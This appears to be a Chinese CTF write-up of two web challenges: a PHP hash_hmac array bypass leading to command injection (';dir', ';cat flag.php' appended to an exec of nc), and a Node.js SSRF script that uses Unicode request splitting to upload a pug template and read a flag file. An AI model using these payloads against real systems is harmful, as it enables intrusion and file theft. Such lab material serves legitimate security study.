[羊城杯 2020]Blackcat
知识点
- hash_hmac()函数绕过
题解
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
die('谁!竟敢踩我一只耳的尾巴!');
}
$clandestine = getenv("clandestine");
if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if($hh !== $_POST['Black-Cat-Sheriff']){
die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}
echo exec("nc".$_POST['One-ear']);
很明确,秘钥未知,如何知道通过sha256加密之后的值?
hash_hamc($algo, $data, $key, $binary)
如果传入数组, 加密的结果为NULL
一旦这个结果为NULL, 那么下一次的hash加密的 秘钥为空,我们也就可以得到了最终的密文
Payload
Black-Cat-Sheriff=83a52f8ff4e399417109312e0539c80147b5514586c45a6caeb3681ad9c1a395&White-cat-monitor[]=0&One-ear=;dir
Black-Cat-Sheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6&White-cat-monitor[]=0&One-ear=;cat flag.php
;的作用:这里是exec(), 用;分割前面的nc, 后面加上自己想执行的命令
这里我用ls命令没有看到flag,用dir命令就可以看到,不知道为什么
参考
https://blog.csdn.net/K1ose/article/details/115434093
https://www.cnblogs.com/magic123/articles/17510131.html
[GYCTF2020]Node Game
知识点
- SSRF
- Nodejs,Unicode字符损坏
题解
一个源码
一个文件上传(检测ip为127.0.0.1):由于这个检测的方式是remoteAddress无法通过HTTP头伪造
服务端会对url进行访问 -> SSRF -> 由服务端进行的请求
Payload[ 网上的脚本 ]
import urllib.parse
import requests
payload = ''' HTTP/1.1
Host: x
Connection: keep-alive
POST /file_upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryO9LPoNAg9lWRUItA
Content-Length: {}
cache-control: no-cache
Host: 127.0.0.1
Connection: keep-alive
{}'''
body='''------WebKitFormBoundaryO9LPoNAg9lWRUItA
Content-Disposition: form-data; name="file"; filename="lmonstergg.pug"
Content-Type: ../template
doctype html
html
head
style
include ../../../../../../../flag.txt
------WebKitFormBoundaryO9LPoNAg9lWRUItA--
'''
more='''
GET /flag HTTP/1.1
Host: x
Connection: close
x:'''
payload = payload.format(len(body)+10,body)+more
payload = payload.replace("\n", "\r\n")
payload = ''.join(chr(int('0xff' + hex(ord(c))[2:].zfill(2), 16)) for c in payload)
print(payload)
session = requests.Session()
session.trust_env = False
session.get('http://7044c75e-31ef-49dc-8c66-b54adb18119c.node5.buuoj.cn:81/core?q=' + urllib.parse.quote(payload))
response = session.get('http://7044c75e-31ef-49dc-8c66-b54adb18119c.node5.buuoj.cn:81/?action=lmonstergg')
print(response.text)
参考
dgg/article/details/119068329)